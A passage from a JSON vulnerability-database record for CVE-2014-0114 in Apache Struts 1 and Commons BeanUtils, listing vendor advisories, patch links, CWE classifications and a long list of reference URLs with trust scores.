            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014verbose-1972958.html"
          },
          {
            "title": "Does CVE-2014-0114 affect Struts 1 in Red Hat products?",
            "trust": 0.8,
            "url": "https://access.redhat.com/solutions/869353"
          },
          {
            "title": "Bug 1116665",
            "trust": 0.8,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
          },
          {
            "title": "Bug 1091938",
            "trust": 0.8,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
          },
          {
            "title": "July 2014 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/july_2014_critical_patch_update"
          },
          {
            "title": "October 2014 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/october_2014_critical_patch_update"
          },
          {
            "title": "January 2015 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update"
          },
          {
            "title": "TERASOLUNA Framework",
            "trust": 0.8,
            "url": "http://en.sourceforge.jp/projects/terasoluna/"
          },
          {
            "title": "Apache Struts 1.2.9 with SP1 by NTT DATA",
            "trust": 0.8,
            "url": "http://en.sourceforge.jp/projects/terasoluna/wiki/StrutsPatch1-EN"
          },
          {
            "title": "struts-1.2.9-4jpp.8.el5_10.src",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743"
          },
          {
            "title": "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192995 - Security Advisory"
          },
          {
            "title": "Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=96f4091aa31a0ece729fdcb110066df5"
          },
          {
            "title": "Red Hat: CVE-2014-0114",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0114"
          },
          {
            "title": "Red Hat: Important: Fuse 7.1 security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182669 - Security Advisory"
          },
          {
            "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2019",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2018",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
          },
          {
            "title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
          },
          {
            "title": "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=68c6989b84f14aaac220c13b754c7702"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
          },
          {
            "title": "struts1-patch",
            "trust": 0.1,
            "url": "https://github.com/ricedu/struts1-patch "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/weblegacy/struts1 "
          },
          {
            "title": "struts1filter",
            "trust": 0.1,
            "url": "https://github.com/rgielen/struts1filter "
          },
          {
            "title": "StrutsExample",
            "trust": 0.1,
            "url": "https://github.com/vikasvns2000/StrutsExample "
          },
          {
            "title": "struts-mini",
            "trust": 0.1,
            "url": "https://github.com/bingcai/struts-mini "
          },
          {
            "title": "strutt-cve-2014-0114",
            "trust": 0.1,
            "url": "https://github.com/anob3it/strutt-cve-2014-0114 "
          },
          {
            "title": "super-pom",
            "trust": 0.1,
            "url": "https://github.com/ian4hu/super-pom "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Use of unmaintained third-party components (CWE-1104) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Path traversal (CWE-22) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Execution with unnecessary privileges (CWE-250) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Inappropriate authorization (CWE-285) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Improper authentication (CWE-287) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Authentication bypass using alternate path or channel (CWE-288) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Inappropriate restriction of excessive authentication attempts (CWE-307) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Unlimited upload of dangerous types of files (CWE-434) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Inadequate protection of credentials (CWE-522) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Cross-site scripting (CWE-79) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of certification (CWE-862) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Private features (CWE-912) [IPA Evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-DesignError",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0114"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.8,
            "url": "http://www.securityfocus.com/bid/67121"
          },
          {
            "trust": 2.5,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html"
          },
          {
            "trust": 2.2,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
          },
          {
            "trust": 2.2,
            "url": "http://www.debian.org/security/2014/dsa-2940"
          },
          {
            "trust": 2.2,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21675496"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296"
          },
          {
            "trust": 1.9,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
          },
          {
            "trust": 1.9,
            "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
          },
          {
            "trust": 1.9,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
          },
          {
            "trust": 1.9,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
          },
          {
            "trust": 1.9,
            "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
          },
          {
            "trust": 1.9,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
          },
          {
            "trust": 1.9,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128"
          },
          {
            "trust": 1.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972"
          },
          {
            "trust": 1.7,
            "url": "http://jvn.jp/en/jp/jvn30962312/index.html"
          },
          {
            "trust": 1.7,
            "url": "http://advisories.mageia.org/mgasa-2014-0219.html"
          },
          {
            "trust": 1.7,
            "url": "https://security.gentoo.org/glsa/201607-09"
          },
          {
            "trust": 1.7,
            "url": "https://access.redhat.com/errata/rhsa-2019:2995"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://openwall.com/lists/oss-security/2014/06/15/10"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://issues.apache.org/jira/browse/beanutils-463"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/57477"
          },
          {
            "trust": 1.6,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898"
          },
          {
            "trust": 1.6,
            "url": "http://openwall.com/lists/oss-security/2014/07/08/1"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://security.netapp.com/advisory/ntap-20140911-0001/"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59430"
          },
          {
            "trust": 1.6,
            "url": "http://seclists.org/fulldisclosure/2014/dec/23"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/58851"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59704"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59480"
          },
          {
            "trust": 1.6,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59246"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59245"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59479"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59118"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/58947"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59014"
          },
          {
            "trust": 1.6,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/58710"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387"
          },
          {
            "trust": 1.6,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
          },
          {
            "trust": 1.6,
            "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59464"
          },
          {
            "trust": 1.6,
            "url": "https://access.redhat.com/errata/rhsa-2018:2669"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755"
          },
          {
            "trust": 1.6,
            "url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2"
          },
          {
            "trust": 1.6,
            "url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59228"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
          },
          {
            "trust": 1.6,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/60177"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/60703"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/59718"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2"
          },
          {
            "trust": 1.6,
            "url": "https://security.netapp.com/advisory/ntap-20180629-0006/"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://access.redhat.com/solutions/869353"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.6,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e"
          },
          {
            "trust": 1.2,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0497.html"
          },
          {
            "trust": 0.9,
            "url": "http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation"
          },
          {
            "trust": 0.9,
            "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674435"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674428"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674937"
          },
          {
            "trust": 0.9,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675822"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673663"
          },
          {
            "trust": 0.9,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672316"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676375"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673098"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673944"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673101"
          },
          {
            "trust": 0.9,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0498.html"
          },
          {
            "trust": 0.9,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728"
          },
          {
            "trust": 0.9,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828"
          },
          {
            "trust": 0.9,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680848"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676646"
          },
          {
            "trust": 0.9,
            "url": "http://struts.apache.org/release/2.3.x/docs/s2-021.html"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042186"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042185"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042184"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037507"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830"
          },
          {
            "trust": 0.9,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037825"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037409"
          },
          {
            "trust": 0.9,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037506"
          },
          {
            "trust": 0.9,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0500.html"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673757"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673508"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673695"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674099"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674104"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673992"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674110"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673982"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673422"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680716"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675387"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677802"
          },
          {
            "trust": 0.9,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674310"
          },
          {
            "trust": 0.9,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674191"
          },
          {
            "trust": 0.9,
